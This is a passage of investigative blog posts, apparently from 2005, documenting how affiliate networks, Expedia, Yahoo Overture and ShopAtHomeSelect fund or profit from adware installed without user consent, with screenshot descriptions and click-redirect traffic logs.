The commissions at issue are ultimately paid by merchants. Sophisticated, dedicated merchants can detect these fraudulent claims — and refuse to pay the commissions at issue.

Some merchants look to networks to identify and block improper affiliate actions. But as shown in the examples above and as discussed below, networks have failed to address this problem. In addition, independent merchants (those who recruit affiliates directly, without using an afiliate network) have no network to assist them in fraud prevention — meaning they’re all the more vulnerable to rogue affiliates.

As a first step in preventing affiliates from buying traffic from spyware vendors, merchants should specifically prohibit this practice, via new provisions in their affiliate terms & conditions. Merchants should also examine the affiliates who apply to their affiliate programs. But even careful screening of affiliates’ applications and sites can’t detect all rogue affiliates; some affiliates are entirely legitimate but for their use of spyware. Where an affiliate combines a legitimate affiliate web site with additional traffic purchased from a spyware vendor, mere examination of the affiliate’s web site will not reveal the spyware traffic.

Some merchants seek out rogue affiliates by looking for transactions with missing HTTP Referer headers. When a user clicks from one web site to another, the second server generally receives the URL of the originating page on the first server — the “HTTP Referer.” But when a page is loaded by spyware, i.e. as an unrequested popup, the referrer field is blank. So affiliates with blank refererrs often turn out to be getting traffic from popups rather than from bona fide clicks within affiliates’ web pages. (That said, this method is imperfect too: Some popups submit fake referrer header data.)

These days, savvy merchants conduct testing of various spyware programs to identify rogue affiliates. It’s remarkably cheap to buy a few spare machines and infect them with a mix of spyware. For best results, merchants need to add packet sniffers or other detailed network logging, and all infected machines should be kept outside the corporate firewall. But with this equipment on hand, finding spyware-driven affiliates can require only a bit of browsing.

Other merchants hire outsiders to do this work. I provide this service to a few merchants, but there are plenty of other choices too. Some merchants even offer bounties (example: provision 3.b) to those who detect and report affiliates buying spyware traffic.

What Networks Should Do

Affiliate networks frequently boast of the quality of their affiliates. Commission Junction claims to “continually screen the network” for rogue affiliates, and to “monitor … all activity for signs of non-compliant client activity.” LinkShare claims that its network features “appropriate” affiliates. But in fact affiliate networks are plagued by affiliates whose practices defraud merchants rather than benefit them. Furthermore, despite their claims of quality, networks could do far more to eliminate rogue affiliates.

Stopping affiliates’ use of spyware must begin with comprehensive testing. In hands-on testing in my lab, I have documented literally hundreds of rogue affiliates — often dozens of different such affiliates in a single week. (See the examples above, as well as ten examples I posted during summer 2004.)

Beyond hands-on testing, efficient compliance requires special software to identify rogue affiliates automatically. I wrote such software earlier this year, and when I run this software against major adware programs, I often uncover dozens or scores of new rogue affiliates. In May, I posted summary results — analyzing 157,083 pop-up ads then shown by 180solutions, and finding that 686 claimed commissions via Commission Junction. (Others claimed commission via LinkShare, Performics, and numerous smaller or independent affiliate programs.) With automated testing methods now available, affiliate networks cannot credibly claim that large-scale testing is impractically difficult or unreasonably time-consuming.

It’s hard to know what testing methods affiliate networks actually use to conduct their testing: Networks usually treat their testing methods as confidential, either for competitive reasons or to avoid assisting would-be fraudsters. I sense that networks do do some hands-on testing, but their efforts may be less than merchants hope (especially given the size of networks’ fees). I don’t hear talk of affiliate networks running any automated testing of spyware programs. In any event, the scope of the spyware-affiliate problem reflects networks’ failure to resolve this issue: If networks were predictably catching affiliates who buy traffic from spyware, and if networks were predictably canceling any commissions claimed via such methods, scores of affiliates wouldn’t be continuing to attempt these methods.

Affiliate networks also need to impose tough penalties on those affiliates caught breaking the rules. For one, networks should take action promptly, not allow further commissions to be paid. But it’s not enough just to cancel current commissions: If breaking the rules yields only a slap on the wrist, then affiliates will continue the spyware assault, earning large profits until they’re ultimately caught. Instead, affiliate networks should get tough on spyware — demand repayment of commissions previously paid, to eliminate affiliates’ incentive to attempt to buy spyware traffic.

The more affiliate merchants pay out in commission, the larger merchants’ fees to affiliate networks. So networks have a clear incentive to look the other way, allowing spyware fraud to continue, with merchants paying the bill. But networks should not overplay their hand. It is at best unseemly for networks to profit when merchants are defrauded by rogue affiliates. Furthermore, the perception of spyware fraud in leading affiliate networks has created an opportunity for spyware and adware-free networks — Kowabunga, ShareASale, and others, as well as newcomer MPORT (which recently launched its network with the promise of blocking adware).

Last week’s announcement of LinkShare’s acquisition by Japanese portal Rakuten recalls the underlying promise of affiliate marketing. There is real value in affiliate relationships, and Rakuten certainly doesn’t intend to pay $425 million for a share in the spyware business. But does Rakuten understand the extent to which LinkShare funds payments to vendors who install advertising software without users’ consent? The extent to which LinkShare has failed to put a check on these behaviors? I’m not sure. Rakuten should demand better — and so should the merchants who ultimately pay for this mess.

How Expedia Funds Spyware

Unwanted advertising programs — typically called spyware — are funded by thousands of the world’s largest companies and most respected advertisers. Ask most of these advertisers about their support for spyware, and they’ll say they didn’t know. After all, their affiliates might have bought the ads. Their outsourced advertising placement firms might have made the decisions. Or pay-per-click search engines (including Google and Yahoo) might have syndicated their ads to spyware vendors, without advertisers’ knowledge or consent. (Details: Google, Yahoo)

But a few advertisers have the gall to defend advertising through spyware. Earlier this year, the Associated Press asked Expedia about its support for spyware. Expedia’s spokesman responded:

“It is just a marketing tool that we use.”

Expedia subsequently claimed to have “rigorous standards” for advertising software, including “mak[ing] sure customers want [the] ads.”

Despite Expedia’s claims of user consent, Expedia advertises with numerous programs that don’t get user consent at all.

Expedia Supports 180solutions, Direct Revenue, and eXact Advertising

The screenshots below show Expedia ads shown by the vendors listed at right. Below each vendor’s name are potentially-objectionable practices of that vendor — practices observed currently or in recent months. In each instance, practices include installation through security holes, with no notice or consent.

All ads were observed in September 2005. Click an ad to see a full-size screenshot with additional commentary.

An Expedia popup shown by 180solutions when I  browsed to aa.com.  

180solutions (Zango / 180search Assistant)

An Expedia popunder shown by Direct Revenue when I browsed to jetblue.com.  Shown after activation of the popunder.

Direct Revenue (Aurora, Ceres, etc.)

An Expedia popunder shown by eXact Advertising when I browsed to jetblue.com.  Shown after activation of the popunder.

eXact Advertising (BullsEye)

Intermediaries Placing and Tracking Expedia’s Spyware Ads

Comments from Expedia staff indicate that Expedia is aware of its relationships with “adware” vendors. Nonetheless, advertising intermediaries help facilitate, track, and fund these relationships. Users may therefore place some blame on advertising intermediaries.

In my May analysis of intermediaries helping to fund spyware, I offered as an example an Expedia ad served by 180solutions via aQuantive’s Atlas Solutions.

Other Expedia ads flow through other intermediaries, although each of the ads shown above ultimately reaches Expedia via Atlas Solutions. For example, the ad shown by eXact also passes through Xctrk.com (SearchBoss) and 24/7 Real Media before reaching Atlas.

Although spyware traffic reaches Expedia through advertising intermediaries, Expedia’s servers receive detailed information about the sources of newly-arrived users referred through spyware advertising. For example, see the partial screenshot below, showing an Expedia popup delivered by 180solutions, covering American Airlines at aa.com. Notice that the URL to Expedia includes the string “metdr” in the URL bar. “Metdr” is an abbreviation for MetricsDirect, 180’s advertising sales unit. The presence of this text in Expedia’s URL indicates Expedia’s specific knowledge that the ad is coming from 180solutions. Under these circumstances, Expedia cannot claim to be unaware that it is supporting 180solutions. My full ad screenshots present similar tracking codes in Expedia’s ads as shown by other spyware vendors.

What Expedia Should Do

While Expedia continues advertising with notorious spyware vendors, other major advertisers have ceased relationships with such vendors and publicly voiced their disapproval of these vendors’ practices. In June 2004, Major League Baseball announced (paid registration required)) that it won’t work with companies who use spyware — specifically mentioning unwanted advertisements as a negative consequence of spyware, and thereby seeking to implicate the various vendors Expedia supports. Verizon also said it would cease advertising through what it called “adware.” Wells Fargo staff wrote an op-ed criticizing spyware, noting negative effects of unwanted advertising software on PC reliability as well as on web site integrity. More recently, Netflix announced its intention to cease such advertising (though in my testing, some Netflix ads are still distributed through the vendors listed above, often intermediated through Netflix’s affiliate program).

Expedia’s recent comments to the Associated Press propose an appropriate initial standard — that ads shouldn’t be shown to users through advertising software users didn’t agree to install. But if Expedia aspires to enforce this standard, it needs to better examine how advertising software actually becomes installed. As indicated by the many links above, spyware researchers have uncovered numerous nonconsensual installations of the very programs Expedia currently supports. Expedia staff should review industry sources and perhaps even conduct hands-on tests of their own, to make sure the vendors Expedia supports are not vendors that install without consent or otherwise engage in undesired practices.

These lessons also apply to other large travel sites. In my testing, travel ads appear particularly frequently through spyware, and in the course of recent testing, I received spyware-delivered ads promoting Cheaptickets, Hotels.com, Hotwire, Orbitz, Priceline, and Travelocity. In many instances, these vendors hire spyware to target each other — e.g. Travelocity might buy ads that cover Priceline’s site, but once a user reaches Travelocity, a new Priceline pop-up ad will pull the consumer right back. These many spyware-delivered ads entail large payments from travel services (and ultimately the consumers who fund them) to spyware vendors. The online travel industry would surely be better off if all firms agreed to cease this aggressive spyware-delivered advertising. By reducing funding of spyware, such an agreement would offer substantial benefits to consumers too.

How Yahoo Funds Spyware updated September 5, 2005

Yahoo’s Overture (recently renamed Yahoo Search Marketing) allocates pay-per-click (PPC) ads among Yahoo’s network of advertisers. When users run searches at yahoo.com, Yahoo’s advertisers are assigned placements at the top, right, and bottom of search results. Advertisers pay Yahoo a fee when users click on their ads.

But Yahoo doesn’t just show advertisers’ ads on yahoo.com; Yahoo also distributes advertisers’ ads to Yahoo’s various syndication partners. Many of these partners are entirely legitimate: For example, most advertisers will be happy to show their ads to users running searches at washingtonpost.com, where Yahoo sponsored links complement searches of Post articles.

However, serious concerns arise where Yahoo syndicates advertisers’ ads to be shown by advertising software installed on users’ PCs — software typically known as spyware or adware. In my testing, Yahoo’s funding of spyware is widespread and prevalent — an important source of revenue for many spyware programs installed on millions of users’ PCs. Were it not for Yahoo’s funding of these programs, the programs would be far less profitable — and there would be fewer such programs trying to sneak onto users’ PCs.

Yahoo’s funding of spyware is not unique. I’ve recently written about Google’s funding of similar bad actors (1, 2). Earlier this year, FindWhat disclosed related problems, admitting that terminating its dubious distributors would reduce revenues by at least 5%. But in my hands-on testing of various spyware-infected PCs, I find that I receive Yahoo-syndicated ads more frequently than I receive such ads from any other single PPC network.

This article proceeds in three parts. First, I show examples of Yahoo ads supporting Claria, eXact Advertising, Direct Revenue, 180solutions, and various others; I also review the objectionable practices of each of these vendors. (Numerous additional examples on file.) Second, I review Yahoo’s disclosures to advertisers — finding that Yahoo has failed to tell advertisers about its controversial syndication partners, even in general terms. I conclude with recommendations to Yahoo (and other PPC search engines that allow syndication), as to how to put an end to this mess and avoid such problems in the future.

Claria (Gator / GAIN): SearchScout Popunders of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Claria, targeting a Google search for the same phrase.  Shown after activating the popunder. A Yahoo Overture popunder, delivered by Claria, targeting a Google search for the same phrase. Shown after activating the popunder.

A Yahoo Overture popunder, delivered by Claria, showing sponsored results for A Yahoo Overture popunder, delivered by Claria, showing sponsored results for “computer” when users visit Dell.com. Shown after activating the popunder and right-clicking the ad to show its destination.

    PPC advertisers (i.e. Dell)    
money viewers
Yahoo Overture
money viewers
Claria (Gator / GAIN)

The money trail – how funds flow from advertisers to Yahoo Overture to Claria.

Likely Yahoo’s largest single advertising software syndicator, Claria shows Yahoo Overture pay-per-click ads in popunders triggered by users’ web browsing.

Before showing Yahoo ads, Claria software must first become installed on users’ computers. Claria’s installation often proceeds without meaningful user consent. For example, Claria often gets installed through software bundles — where a user seeks one program but gets Claria too. Historically, Claria’s bundles have featured lengthy license agreements (as long as 5,900+ words and 63 on-screen pages), broken license formatting (missing line breaks, making section headings hard to find), and substantively unreasonable terms (including restrictions on how users can remove Claria software). Claria also promotes its software through banner ads — including ads on kids sites, claiming to fix computer clocks or improve computer security, showing a license only after installation has begun and cannot be cancelled. Some Claria uninstallers don’t work — leading users in circles rather than actually removing Claria software.

Claria’s core business is showing pop-up ads specifically purchased by advertisers. (See my 2003 listings, including well-known advertisers. See also PC Pitstop listing based on Claria 2003 disclosures.) But Claria also shows popunders of Yahoo Overture sponsored links. Search for “computer repair” at any major search engine, and Claria adds a popunder giving Yahoo Overture ads for that same term. Sponsored link popunders also target specific web sites. Visiting Dell often yields a Claria popunder of Yahoo Overture ads for “computer.”

Claria’s provision of Yahoo Overture sponsored links raises clear questions of business benefit for affected advertisers. In the second screenshot at right, the user was already at the Dell.com site. (Indeed, Dell might have just paid several dollars to reach that user, via a pay-per-click ad at Yahoo, Google, or elsewhere.) Claria’s popunder risks drawing the user’s attention away from Dell — but if the user then clicks on the prominent Dell ad in Claria’s Overture listing, Dell has to pay again for the same user who was already at the Dell site. Why pay Yahoo and Claria to get the user back, when it was they who took the user from Dell in the first place?

Claria’s provision of Yahoo Overture sponsored links also presents ethical concerns. Many advertisers dislike Claria’s practices — including its aggressive methods of becoming installed on users’ PCs, its serious effects on privacy, and its harm to computer performance. Indeed, when I previously revealed that, through another channel, Dell was advertising with Claria in mid 2004, Dell staff sought to distance Dell from Claria, commenting “[T]oday we do not do business with anyone like Claria.” But despite Dell’s stated dislike of Claria, Dell does help fund Claria when Dell purchases pay-per-click ads from Yahoo: Payment flows from Dell to Yahoo to Claria, as shown in the diagram at right. Same for thousands of other Yahoo Overture advertisers.

In the future, Claria purports to plan to shut down its popup business. That’s a move I applaud — it’s been a bad business from the start. But at present Claria still serves lots of popups — including Yahoo Overture popunders as frequently as every few minutes. These ads are big money: Claria’s 2003 SEC S1 discloses receiving $31 million from Yahoo in 2003 alone — despite a relationship only in place for 9 months of that year. Annualizing the payment and taking account of the dramatic increase in pay-per-click fees, Yahoo might now be paying Claria $50 million or more per year. (It’s hard to know for sure because Claria hasn’t filed more recent financial disclosures, and Yahoo doesn’t include this level of detail in its financial reports.)

eXact Advertising – Popups and Sidebars of Yahoo Sponsored Links

A Yahoo Overture auto-opening sidebar, delivered by eXact Advertising, targeting Google search results. A Yahoo Overture auto-opening sidebar, delivered by eXact Advertising, targeting Google search results.

  PPC advertisers
money viewers
   Yahoo Overture   
money viewers
eXact Advertising

The money trail – how funds flow from advertisers to Yahoo Overture to eXact Advertising.

Claria claims to always install with consent — however tricky or ill-gotten, per my testing and documentation. But other Yahoo Overture syndicators can’t even make this claim. On dozens of occasions, I have observed and recorded software from eXact Advertising installed through security holes, with no notice or consent. (Some examples: 1, 2.) I’ve also seen eXact installed by tricky popups claiming to be required to view sexually-explicit videos, and by unrequested popups claiming to offer “browser enhancements.” Others have reported eXact bundled by P2P-distributed videos purporting to offer child pornography, and even by instant messenger worms. In short, when a user has software from eXact, the user is unlikely to have granted meaningful informed consent to the installation, and the user may not have granted any consent at all. Reporters tell me that eXact claims to have fixed these problems, but that’s just not true: I’ve received nonconsensual installations of eXact software this very week. Videos on file.

Despite its poor installation practices, eXact receives Overture sponsored links, shows these advertisements to users, and presumably is paid by Yahoo for doing so.

See screenshot at right, showing an eXact auto-opening sidebar that appeared as I ran a search at Google. The sidebar shows Yahoo Overture links, and clicking a link sends users to Overture and on to the advertiser (without passing through any other search intermediary). Notice the Overture reference in the browser status bar as I hold my mouse over a sponsored link.

To typical users, the eXact-delivered Yahoo Overture sidebar appears to be an integrated part of search results — presumably delivered by Google (or whatever other search engine the user had requested). Notice the absence of any distinctive branding, logo, disclosure, or other identification that the sidebar comes from eXact and Overture. To find such a disclosure, a user must scroll to the bottom of the sidebar. Even there, the disclosure is truncated and hard to read. Screenshot.

eXact’s BullsEye service also shows sponsored link listings in freestanding windows. Here too, results are obtained from Yahoo Overture. Screenshot.

Direct Revenue – Popups and Popunders of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder. A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder.

  PPC advertisers (i.e. Dell)  
money viewers
   Yahoo Overture   
money viewers
InfoSpace
money viewers
Direct Revenue

The money trail – how funds flow from advertisers to Yahoo Overture to Direct Revenue.

Direct Revenue installations are at least as poor as eXact. I have numerous videos on file showing DR installed without consent (one such video on my public site). DR also uses various other tricky methods to get installed — like tricky popups, bundles, etc. But DR is perhaps worse than other advertising software in its unusual difficulty of removal (requiring downloading a special uninstaller from DR’s web site). DR is also unusual in its ability to disable and delete other software on a user’s PC.

Despite these troubling practices, DR also shows Yahoo Overture ads. See e.g. the example ad at right. The searchblazer results appeared when I browsed to Dell.com. Notice Direct Revenue’s “Aurora” branding in the upper-left corner and title bar. Although the ad’s body lacks any Direct Revenue branding or logo, the ad was loaded from the search.offeroptimizer.com server, a server under DR’s control. (Offeroptimizer.com is a well-known DR domain.) Furthermore, clicking on a sponsored link within the ad caused traffic that first passed through search.offeroptimizer.com en route to Overture. In short, this ad is not a rogue advertiser buying traffic from Direct Revenue. Rather, these sponsored links were specifically placed by Direct Revenue itself.

When I clicked on the first sponsored link shown at right, traffic flowed as listed below. See also full packet log.

http://xadsj.offeroptimizer.com/c/click.php?c=48685&s=5261&…
http://msxml.infospace.com/_1_B2HUEF099WI63__dirrev.feed.pu1/…
http://www10.overture.com/d/sr/?xargs=…
http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278&LID=230157&…

As indicated in the diagram at right and in the traffic flow above, Yahoo Overture syndicates its ads to InfoSpace, and InfoSpace in turn syndicates these ads to Direct Revenue. This series of relationships makes it particularly hard for Yahoo Overture to know where its advertisers’ ads will appear: Yahoo must count on InfoSpace to assure the quality, ethics, and compliance of InfoSpace’s partners.

This is not the first instance of InfoSpace partners with questionable practices. In June I documented Google ads syndicated to the IBIS Toolbar (also known to become installed without consent). Like Overture ads passing through InfoSpace en route to Direct Revenue, these Google ads were passed from Google InfoSpace to IBIS.

As in the Claria examples above, Direct Revenue syndications of Yahoo Overture ads often ask advertisers to pay for visitors already at their sites. In the example above, Dell was targeted by a list of sponsored links that places Dell in both of the top two positions. If a user clicks on one of these links, Dell pays Yahoo (and ultimately Direct Revenue) for a user who was already at the Dell site. Screenshot.

180solutions – Popups of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder. A Yahoo Overture popup delivered by 180solutions.

  PPC advertisers (i.e. Driverloans)  
money viewers
   Yahoo Overture   
money viewers
InfoSpace
money viewers
180solutions

The money trail – how funds flow from advertisers to Yahoo Overture to 180solutions.

When I first posted this piece, I included no mention of 180solutions. My rationale: They’ve been involved in so many widely-publicized spyware scandals — from installing without consent, to installing with euphemisms (but no EULA) at kids sites, to installing at child porn sites — that undisclosed syndication of Yahoo Overture ads seemed like the least of their problems. Perhaps that’s right. But multiple readers asked me whether 180 wasn’t involved also, and why 180 wasn’t included in my write-up. So make no mistake about it: 180 shows Yahoo Overture ads too.

The screenshot at right shows a popup of Yahoo Overture ads delivered by 180solutions. In testing, I click on the ad, and traffic flows to InfoSpace, then to Overture, then to the advertiser. See traffic log below, and full packet log. See also a video of this click, showing the cookies created as a result of the click.

http://searchresults.180searchassistant.com/clicks.php?p==…
http://msxml.infospace.com/_1_YWCU9J03JUL8FV__180sol.feed/…
http://www10.overture.com/d/sr/?xargs=…
http://www.driverloans.com/app/2p1a?x=seoyahoo:value

Other Advertising Software Installed Improperly – Showing Yahoo Sponsored Links

Yahoo Overture ads in an auto-opening sidebar delivered by Sidefind, targeting type-ins to Dell with Dell sponsored links. Yahoo Overture ads in an auto-opening sidebar delivered by Sidefind, showing Dell sponsored links in response to type-in requests for the Dell.com site.

  PPC advertisers (i.e. Dell)  
money viewers
   Yahoo Overture   
money viewers
81.201.104.136
money viewers
trafficengine.net
money viewers
SideFind

The money trail – how funds flow from advertisers to Yahoo Overture to SideFind.

Claria, eXact Advertising, Direct Revenue, and 180solutions are all relatively well-known programs — each installed on millions (or tens of millions) of PCs, and each backed by major investors. But Yahoo also helps to fund vendors who are far less well-known.

Earlier this summer, in the course of documenting Google funding IBIS, I also prepared detailed proof showing how Yahoo ads get syndicated to IBIS too. Video and packet logs on file.

Just this past week, I happened to test a computer infected with a variety of unwanted software (a few disclosed in license agreements; most not). I observed that traffic was sent to Yahoo from both “Slotchbar” (an unrequested toolbar added to my test PC’s browser without my consent) and “SideFind” (an auto-opening browser sidebar, also installed without consent). I have video and packet logs on file, showing these nonconsensual installations as well as their syndication of PPC advertisements from Yahoo Overture. The screenshot at right shows the auto-activating SideFind sidebar, targeting a type-in request for Dell with various sponsored links, largely pointing back to Dell.

These are just a few of the additional examples I have observed and recorded.

In some instances, Yahoo’s dealings with these smaller spyware vendors entail traffic passing through multiple levels of intermediaries. For example, when SideFind sends traffic to Yahoo Overture, the traffic passes through trafficengine.net and then through an unnamed server at IP address 81.201.104.136 (reportedly operated by Copernic/Inktomi) before reaching Overture. See diagram at right, traffic log below, and full packet log.

http://www.sidefind.com/ist/scripts/log_clicks.php?account_id=…
http://feeds.trafficengine.net/click.ashx?key=computers…
http://81.201.104.136/fast-cgi/bsc?context=redir…
http://www6.overture.com/d/sr/?xargs=…
http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278…

In principle, these many levels of intermediation might make it especially hard for Yahoo to know where traffic begins. However, Yahoo ultimately has a direct relationship with some final source who sends the traffic to Yahoo. (In this example, Yahoo has a direct relationship with the operators of the 81.201.104.136 server.) So Yahoo can require that that final source take steps to keep Yahoo’s ads out of spyware. Furthermore, syndicated traffic often includes a HTTP Referer header that gives the name of the originating site. For example, in the Sidefind packet log, Yahoo’s servers receive a HTTP Referer header bearing the domain name sidefind.com, making it easy for Overture to see where traffic began. With its servers specifically receiving the name and URL of the traffic’s source, Yahoo cannot claim not to know where its ads are being shown.

Yahoo’s Failure to Disclose

If Yahoo’s advertisers were fairly advised of Yahoo’s plan to syndicate their ads to spyware programs, Yahoo might claim to be acting solely as their agent; perhaps advertisers want to buy advertising from Claria, eXact, DR, 180, and other such vendors. But in fact Yahoo fails to tell advertisers what will occur — so Yahoo’s syndication of advertisers’ ads cannot be claimed to occur with advertisers’ authorization.

Yahoo’s marketing materials are silent on the risk of spyware syndication, even where Yahoo’s syndication relationships are large and longstanding (i.e. Claria). Within Yahoo’s marketing materials to solicit new advertisers, Yahoo’s “Publisher Network” page mentions various syndicators of Yahoo ads, but Yahoo fails to mention even a single “adware”-type program. Yahoo’s formal Advertiser Terms and Conditions doesn’t mention adware either, and this document discloses advertisement syndication only to say that Yahoo syndicates ads to “various third parties who may be authorized by Overture to make the Sponsored Listings Marketplace Results available as a link from, an add-on service to, or otherwise in connection with Third Party Products.” Yahoo defines these third-party products broadly, as “Web sites, content, applications and/or e-mails.” “Applications” alludes to spyware — but makes no mention of the specific nature of these applications, nor of the likelihood that these applications install by security exploits, trickery, or taking advantage of users’ naivete.

Only at Yahoo’s privacy page does Yahoo make specific mention of any of its advertising software syndicators. Even there, Yahoo mentions only Claria, and Yahoo calls Claria an “ad network” — without mention of its adware, its software download, and its substantial privacy consequences. Furthermore, Yahoo’s privacy page states only that Yahoo has a “relationship” with Claria — but says nothing about the nature or scope of that relationship, i.e. that Claria shows Yahoo Overture ads. In any event, advertisers are unlikely to look to a page about consumer privacy in order to learn where their ads will be shown.

Given the perceived importance and value of Yahoo’s pay-per-click advertising network, some advertisers might choose to advertise with Yahoo despite the blemish of Yahoo’s dealings with spyware companies. Others might decide not to advertiser with Yahoo at all, if advertising with Yahoo necessarily entails supporting spyware. But where Yahoo fails to disclose these relationships, advertisers are denied this choice.

What Yahoo Should Do

In my view, Yahoo — and other PPC networks facing similar problems — should begin by developing and distributing clear rules for who may syndicate their ads. Last year a Yahoo spokesperson told eWeek that “Overture screens its distribution partners to make sure they gain user permission before downloading software.” “Permission” may sound clear-cut, but in practice it’s a surprisingly imprecise concept. What about “permission” obtained under false pretenses — like promising to fix a user’s clock or to improve security, but actually adding advertising software? What about “permission” obtained from a user at a kids site? What about syndicators that buy traffic from advertising software installed without consent, but that don’t make such software of their own? PPC networks need rules that speak to these situations — presumably forbidding all these methods of trickery and deception.

After clarifying their stance on spyware syndicating their ads, PPC networks need to redouble their efforts at enforcement. Tellingly, even Yahoo’s “permission” standard is violated by the frequent nonconsensual installations of Direct Revenue and eXact Advertising (links above). Nonconsensual installations of these programs are well known to those who test and study spyware, and they’re frequently reported at spyware news sites like Spyware Warrior. PPC network staff need to become familiar with these basic industry sources and testing methods, and they need to enforce their rules accordingly.

At present, Yahoo has many PPC syndicators — apparently hundreds or thousands. (Yahoo does not disclose all its syndicators.) Finding all rogue syndicators may prove hard, especially if Yahoo’s syndicators have further partners of their own (as in the Direct Revenue / InfoSpace and SideFind examples, above). In this article, I’ve focused on a few large and well-known syndicators who rely on software installed on millions of PCs, but smaller players are often harder to find and identify. Nonetheless, I’ve found dozens of rogue PPC syndicators using only a single off-the-shelf PC in my lab. (See above.) With all their resources, big PPC networks (like Yahoo) can surely do far better.

Enforcement also needs to include real penalties for those who break the rules. Merely ejecting a rogue syndicator does not deter future violations: Others see that they can make money from PPC syndication through spyware, anticipating only a slap on the wrist when these practices are discovered. A better enforcement strategy would seek to recapture fees previously paid to rogue syndicators — then refund advertisers for ads shown improperly. If a PPC network adopted this strategy and sued its rogue syndicators where necessary, other rogues would be less anxious to follow.

Beyond advertiser backlash and consumer demand, PPC networks face regulatory pressure to avoid supporting spyware through PPC syndication. For example, in the course of their investigation of Intermix, staff of the New York Attorney General revealed that Yahoo contributed 10% of Intermix’s revenue. NYAG staff say they’re “not ruling out” litigation against Yahoo for funding Intermix. More recently, rumors indicate a possible NYAG investigation of Direct Revenue. Given Yahoo’s past support for Intermix, I wonder how NYAG will react to seeing Yahoo funding Direct Revenue too.

If a PPC network can’t or won’t eliminate rogue syndicators, it could at least grant advertisers the ability to opt out of particular unwanted syndications. Others have offered this suggestion on various occasions (e.g. Kraft seeking to avoid syndicating its ads to white supremacy groups), as to both Yahoo Overture and Google. Affiliate networks all offer this level of granularity — letting each affiliate merchant decide what affiliates may earn fees for promoting it. But to my knowledge, no major PPC search engine offers this level of advertiser control.

Ultimately, PPC syndication offers savvy PPC networks a valuable opportunity — a chance to lead industry efforts to stop the spread of unwanted advertising software. Earlier this week, Azoogle launched its new “MPORT” network with the promise of keeping the network entirely adware-free. With a bit of effort and a renewed commitment to stopping spyware, Yahoo could bring MPORT’s no-adware benefit to Overture advertisers too.

Debunking ShopAtHomeSelect updated October 14, 2005

Reading ShopAtHomeSelect‘s marketing materials, their advertising software might seem to present compelling benefits. SAHS promises users rebates on products they’re already purchasing. And SAHS even offers reminder software to make sure forgetful users don’t miss out on the savings. What could be better than timely reminders of free money?

But the SAHS site doesn’t tell the whole story. My testing demonstrates that SAHS software is often installed without users wanting it, requesting it, or even accepting it. (Details.) When users receive an unwanted SAHS installation, SAHS still claims commissions on users’ purchases — but typical users will never see a penny of the proceeds. (Details.) Meanwhile, whether requested by users or not, SAHS’s commission-claiming practices seem to violate stated rules of affiliate networks. (Details.)

Despite these serious problems, SAHS boasts a superstar list of clients — the biggest merchants at all the major affiliate networks, including Dell, Buy.com, Expedia, Gap, and Apple. Why? Affiliate networks have little incentive to investigate SAHS’s practices or assure compliance with stated rules. (Details.) SAHS and affiliate networks profit, but users and merchants are left as victims. (Details.)

Update (October 14): Commission Junction has removed SAHS from its network, thereby ending SAHS’s relationships with all CJ merchants. No word on similar actions by LinkShare or Performics.

Wrongful Installations – No Consent, and Tricky So-Called “Consent”

ShopAtHomeSelect is widely known to become installed without meaningful consent — or, in many cases, without any consent at all. Most egregious are installations through security exploits, without any notice or consent. I continually test these installations in my lab, and I have repeatedly observed SAHS appearing unrequested — more than half a dozen such installs, occurring on distinct sites on distinct days. I posted one such video in May, and I retain the others on file.

3D Screensaver installs SAHS, although the SAHS license does not disclose inclusion of SAHSSAHS’s improper installations extend to many of SAHS’s bundling partners. I have repeatedly seen (and often recorded) SAHS disclosed midway through lengthy license agreements; users often have to scroll through dozens of pages to learn of SAHS’s inclusion. Even worse, some programs that bundle SAHS nonetheless fail to mention SAHS’s inclusion. See e.g. 3D Flying Icons, which shows a 12-page 2,286-word license that makes no mention of SAHS, yet 3D installs SAHS anyway. (Screenshot at right.)

PacerD installs SAHS, although the PacerD EULA does not disclose inclusion of SAHS.In other instances, ActiveX popups pressure users to accept multiple advertising programs in the guise of “browser enhancements” (or similar). In February 2005, I observed an ActiveX popup that labeled itself “website access” and “click yes to continue,” but immediately installed SAHS if users pressed yes once. More recently, I posted an analysis of the PacerD ActiveX. (Screenshot at left.) PacerD’s ActiveX popup links to a license agreement which discloses installation of eight advertising programs — but doesn’t mention SAHS, though Pacer in fact does install SAHS. So even when careful users take the time to examine Pacer’s 1,951-word license, in hopes of learning what they’re getting, there’s no way to learn that SAHS will be installed, not to mention grant or deny consent.

A porn video distributed by BitTorrent (P2P) installs SAHS. Disclosure occurs only if users scroll down several pages in the video's EULA.  Disclosure consists of only a single sentence, without even a link to more information.I’m not the only observer to notice SAHS installed improperly. Earlier this month, VitalSecurity.org reported SAHS installed via IM spam: Users receive an unsolicited instant message, and clicking the message’s link installs SAHS (among other programs) without any notice or consent. Last month, PC Pitstop (1, 2) and VitalSecurity.org reported SAHS bundled with porn videos distributed by BitTorrent — so a user seeking adult entertainment would unwittingly receive SAHS too. In my testing of these BitTorrent videos, SAHS was listed in a license agreement preceding the videos, but users had to scroll past four pages of other text to learn of SAHS’s inclusion, and even then SAHS’s mention was only a single sentence — without even a link to an external SAHS license agreement, and without any description of the privacy effects of installing SAHS software. (See screenshot at right.) Furthermore, these BitTorrent videos aren’t SAHS’s only tie to porn videos. In January, I analyzed ActiveX popups triggered by porn videos. These popups falsely claimed to be required to view the videos, but in fact they were mere ploys seeking to install SAHS and other advertising software.

In short, a user receiving SAHS cannot reasonably be claimed to have wanted SAHS, nor to have granted informed consent. Perhaps some SAHS users run SAHS willingly and knowingly, but many clearly do not.

In contrast, affiliate networks’ rules set a high burden for installation disclosure and consent. LinkShare’s Shopping Technologies Addendum (PDF) requires that disclosure be “full and prominent,” a standard met neither by SAHS’s nonconsensual installations, nor by its installation when bundled with porn videos. Commission Junction’s Publisher Code of Conduct requires that disclosure be “clearly presented to and accepted by” users, and CJ specifically prohibits software that is “installed invisibly” (as in the nonconsensual installations detailed above).

SAHS may claim that these wrongful installations have stopped. But that’s just not credible. I’ve continued to see (and record) these installations as recently as the past few days.

